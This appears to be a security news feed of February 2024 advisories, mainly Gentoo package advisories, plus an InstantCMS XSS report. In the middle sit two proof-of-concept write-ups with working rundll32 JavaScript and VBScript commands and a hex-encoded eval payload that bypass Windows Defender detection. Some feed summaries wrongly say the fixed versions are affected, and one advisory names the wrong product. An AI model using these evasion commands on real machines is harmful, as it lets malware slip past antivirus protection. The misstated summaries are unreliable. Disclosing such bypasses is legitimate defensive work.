Gentoo Linux Security Advisory 202402-26 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions greater than or equal to 115.7.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #924844  
       ID: 202402-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable     Unaffected  
----------------------  -------------  --------------  
www-client/firefox      < 115.7.0:esr  >= 115.7.0:esr  
                        < 122.0:rapid  >= 122.0:rapid  
www-client/firefox-bin  < 115.7.0:esr  >= 115.7.0:esr  
                        < 122.0:rapid  >= 122.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.7.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.7.0:esr"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-122.0:rapid"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-122.0:rapid"

References  
==========

[ 1 ] CVE-2024-0741  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0741  
[ 2 ] CVE-2024-0742  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0742  
[ 3 ] CVE-2024-0743  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0743  
[ 4 ] CVE-2024-0744  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0744  
[ 5 ] CVE-2024-0745  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0745  
[ 6 ] CVE-2024-0746  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0746  
[ 7 ] CVE-2024-0747  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0747  
[ 8 ] CVE-2024-0748  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0748  
[ 9 ] CVE-2024-0749  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0749  
[ 10 ] CVE-2024-0750  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0750  
[ 11 ] CVE-2024-0751  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0751  
[ 12 ] CVE-2024-0752  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0752  
[ 13 ] CVE-2024-0753  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0753  
[ 14 ] CVE-2024-0754  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0754  
[ 15 ] CVE-2024-0755  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0755  
[ 16 ] MFSA-2024-01  
[ 17 ] MFSA-2024-02  
[ 18 ] MFSA-2024-04

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-26

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-26

Back in 2022, the researcher released a proof of concept to bypass the Backdoor:JS/Relvelshe.A detection in Windows Defender but it no longer works as it was mitigated. However, adding a simple javascript try catch error statement and eval'ing the hex string, it executes as of the time of this post.

**Microsoft Windows Defender / Backdoor\_JS.Relvelshe.A Detection / Mitigation Bypass**

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Detection Mitigation Bypass Backdoor:JS/Relvelshe.A[CVE Reference]N/A[Security Issue]Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.[References]https://twitter.com/hyp3rlinx/status/1480657623947091968[Exploit/POC]1) python -m http.server 802) Open command prompt as Administrator3) rundll32  javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")Create file and host on server, this is contents of the "yo.tmp" file.<?xml version="1.0"?><component><script>try{<![CDATA[var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";var str = '';for (var n = 0; n < hex.length; n += 2) {str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));}eval(str)]]>}catch(e){eval(str)}</script></component>[Network Access]Local[Severity]High[Disclosure Timeline]Vendor Notification:  February 18, 2024: Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Windows Defender / Backdoor_JS.Relvelshe.A Detection / Mitigation Bypass

This is additional research regarding a mitigation bypass in Windows Defender. Back in 2022, the researcher disclosed how it could be easily bypassed by passing an extra path traversal when referencing mshtml but that issue has since been mitigated. However, the researcher discovered using multiple commas can also be used to achieve the bypass. This issue was addressed. The fix was short lived as the researcher found yet another third trivial bypass. Previously, the researcher disclosed 3 bypasses using rundll32 javascript, but this example leverages the VBSCRIPT and ActiveX engines.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]www.microsoft.com[Product]Windows Defender[Vulnerability Type]Windows Defender VBScript Detection Mitigation BypassTrojanWin32Powessere.G[CVE Reference]N/A[Security Issue]Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution failand attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine.Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender withan "Access is denied" message.Trojan:Win32/Powessere.GCategory: TrojanThis program is dangerous and executes commands from an attacker.However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection.Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing.E.g.C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)[References]https://twitter.com/hyp3rlinx/status/1759260962761150468https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txthttps://lolbas-project.github.io/lolbas/Binaries/Rundll32/[Exploit/POC]Open command prompt as AdministratorC:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)Access is denied.C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)We win![Network Access]Local[Severity]High[Disclosure Timeline]Vendor Notification:  February 18, 2024 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

Microsoft Windows Defender / Trojan.Win32/Powessere.G VBScript Detection Bypass

Gentoo Linux Security Advisory 202402-25 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.7.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-25  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #918444, #920508, #924845  
       ID: 202402-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.7.0     >= 115.7.0  
mail-client/thunderbird-bin  < 115.7.0     >= 115.7.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.7.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.7.0"

References  
==========

[ 1 ] CVE-2023-3417  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3417  
[ 2 ] CVE-2023-3600  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3600  
[ 3 ] CVE-2023-4045  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4045  
[ 4 ] CVE-2023-4046  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4046  
[ 5 ] CVE-2023-4047  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4047  
[ 6 ] CVE-2023-4048  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4048  
[ 7 ] CVE-2023-4049  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4049  
[ 8 ] CVE-2023-4050  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4050  
[ 9 ] CVE-2023-4051  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4051  
[ 10 ] CVE-2023-4052  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4052  
[ 11 ] CVE-2023-4053  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4053  
[ 12 ] CVE-2023-4054  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4054  
[ 13 ] CVE-2023-4055  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4055  
[ 14 ] CVE-2023-4056  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4056  
[ 15 ] CVE-2023-4057  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4057  
[ 16 ] CVE-2023-4573  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4573  
[ 17 ] CVE-2023-4574  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4574  
[ 18 ] CVE-2023-4575  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4575  
[ 19 ] CVE-2023-4576  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4576  
[ 20 ] CVE-2023-4577  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4577  
[ 21 ] CVE-2023-4578  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4578  
[ 22 ] CVE-2023-4580  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4580  
[ 23 ] CVE-2023-4581  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4581  
[ 24 ] CVE-2023-4582  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4582  
[ 25 ] CVE-2023-4583  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4583  
[ 26 ] CVE-2023-4584  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4584  
[ 27 ] CVE-2023-4585  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4585  
[ 28 ] CVE-2023-5168  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5168  
[ 29 ] CVE-2023-5169  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5169  
[ 30 ] CVE-2023-5171  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5171  
[ 31 ] CVE-2023-5174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5174  
[ 32 ] CVE-2023-5176  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5176  
[ 33 ] CVE-2023-5721  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5721  
[ 34 ] CVE-2023-5724  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5724  
[ 35 ] CVE-2023-5725  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5725  
[ 36 ] CVE-2023-5726  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5726  
[ 37 ] CVE-2023-5727  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5727  
[ 38 ] CVE-2023-5728  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5728  
[ 39 ] CVE-2023-5730  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5730  
[ 40 ] CVE-2023-5732  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5732  
[ 41 ] CVE-2023-6204  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6204  
[ 42 ] CVE-2023-6205  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6205  
[ 43 ] CVE-2023-6206  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6206  
[ 44 ] CVE-2023-6207  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6207  
[ 45 ] CVE-2023-6208  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6208  
[ 46 ] CVE-2023-6209  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6209  
[ 47 ] CVE-2023-6212  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6212  
[ 48 ] CVE-2023-6856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6856  
[ 49 ] CVE-2023-6857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6857  
[ 50 ] CVE-2023-6858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6858  
[ 51 ] CVE-2023-6859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6859  
[ 52 ] CVE-2023-6860  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6860  
[ 53 ] CVE-2023-6861  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6861  
[ 54 ] CVE-2023-6862  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6862  
[ 55 ] CVE-2023-6863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6863  
[ 56 ] CVE-2023-6864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6864  
[ 57 ] CVE-2023-37201  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37201  
[ 58 ] CVE-2023-37202  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37202  
[ 59 ] CVE-2023-37207  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37207  
[ 60 ] CVE-2023-37208  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37208  
[ 61 ] CVE-2023-37211  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37211  
[ 62 ] CVE-2023-50761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-50761  
[ 63 ] CVE-2023-50762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-50762  
[ 64 ] CVE-2024-0741  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0741  
[ 65 ] CVE-2024-0742  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0742  
[ 66 ] CVE-2024-0746  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0746  
[ 67 ] CVE-2024-0747  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0747  
[ 68 ] CVE-2024-0749  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0749  
[ 69 ] CVE-2024-0750  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0750  
[ 70 ] CVE-2024-0751  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0751  
[ 71 ] CVE-2024-0753  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0753  
[ 72 ] CVE-2024-0755  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0755  
[ 73 ] MFSA-2024-01  
[ 74 ] MFSA-2024-02  
[ 75 ] MFSA-2024-04

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-25

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-25

Gentoo Linux Security Advisory 202402-21 - Multiple vulnerabilities have been discovered in QtNetwork, the worst of which could lead to execution of arbitrary code. Versions greater than or equal to 6.6.1-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtNetwork: Multiple Vulnerabilities  
     Date: February 18, 2024  
     Bugs: #907120, #921292  
       ID: 202402-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in QtNetwork, the worst of  
which could lead to execution of arbitrary code.

Background  
==========

QtNetwork provides a set of APIs for programming applications that use  
TCP/IP. It is part of the Qt framework.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  -------------  
dev-qt/qtbase     < 6.6.1-r2    >= 6.6.1-r2  
dev-qt/qtnetwork  < 5.15.12-r1  >= 5.15.12-r1

Description  
===========

Multiple vulnerabilities have been discovered in QtNetwork. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Qt 5 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtnetwork-5.15.12-r1"

All Qt 6 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-qt/qtbase-6.6.1-r2"

References  
==========

[ 1 ] CVE-2023-32762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32762  
[ 2 ] CVE-2023-51714  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51714

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-21

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-21

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

InstantCMS 2.16.1 Cross Site Scripting

Gentoo Linux Security Advisory 202402-24 - Multiple vulnerabilities have been discovered in Seamonkey, the worst of which can lead to remote code execution. Versions greater than or equal to 2.53.10.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-24  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Seamonkey: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #767400, #828479  
       ID: 202402-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Seamonkey, the worst of  
which can lead to remote code execution.

Background  
==========

The Seamonkey project is a community effort to deliver production-  
quality releases of code derived from the application formerly known as  
the ‘Mozilla Application Suite’.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
www-client/seamonkey  < 2.53.10.2   >= 2.53.10.2

Description  
===========

Multiple vulnerabilities have been discovered in Seamonkey. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Seamonkey users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.53.10.2"

References  
==========

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-24

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-24

Gentoo Linux Security Advisory 202402-23 - Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution. Versions greater than or equal to 121.0.6167.139 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-23  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #922062, #922340, #922903, #923370  
       ID: 202402-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives, the worst of which can lead to remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web. Google  
Chrome is one fast, simple, and secure browser for all your devices.  
Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable        Unaffected  
-------------------------  ----------------  -----------------  
www-client/chromium        < 121.0.6167.139  >= 121.0.6167.139  
www-client/google-chrome   < 121.0.6167.139  >= 121.0.6167.139  
www-client/microsoft-edge  < 121.0.2277.83   >= 121.0.2277.83

Description  
===========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-121.0.6167.139"

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-121.0.6167.139"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-121.0.2277.83"

References  
==========

[ 1 ] CVE-2024-0333  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0333  
[ 2 ] CVE-2024-0517  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0517  
[ 3 ] CVE-2024-0518  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0518  
[ 4 ] CVE-2024-0519  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0519  
[ 5 ] CVE-2024-0804  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0804  
[ 6 ] CVE-2024-0805  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0805  
[ 7 ] CVE-2024-0806  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0806  
[ 8 ] CVE-2024-0807  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0807  
[ 9 ] CVE-2024-0808  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0808  
[ 10 ] CVE-2024-0809  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0809  
[ 11 ] CVE-2024-0810  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0810  
[ 12 ] CVE-2024-0811  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0811  
[ 13 ] CVE-2024-0812  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0812  
[ 14 ] CVE-2024-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0813  
[ 15 ] CVE-2024-0814  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0814  
[ 16 ] CVE-2024-1059  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1059  
[ 17 ] CVE-2024-1060  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1060  
[ 18 ] CVE-2024-1077  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1077

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-23

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-23

Gentoo Linux Security Advisory 202402-22 - Multiple vulnerabilities have been discovered in intel-microcode, the worst of which can lead to privilege escalation. Versions greater than or equal to 20230214_p20230212 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-22  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: intel-microcode: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #832985, #894474  
       ID: 202402-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in intel-microcode, the  
worst of which can lead to privilege escalation.

Background  
==========

Intel IA32/IA64 microcode update data.

Affected packages  
=================

Package                       Vulnerable            Unaffected  
----------------------------  --------------------  ---------------------  
sys-firmware/intel-microcode  < 20230214_p20230212  >= 20230214_p20230212

Description  
===========

Multiple vulnerabilities have been discovered in NVIDIA Drivers. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

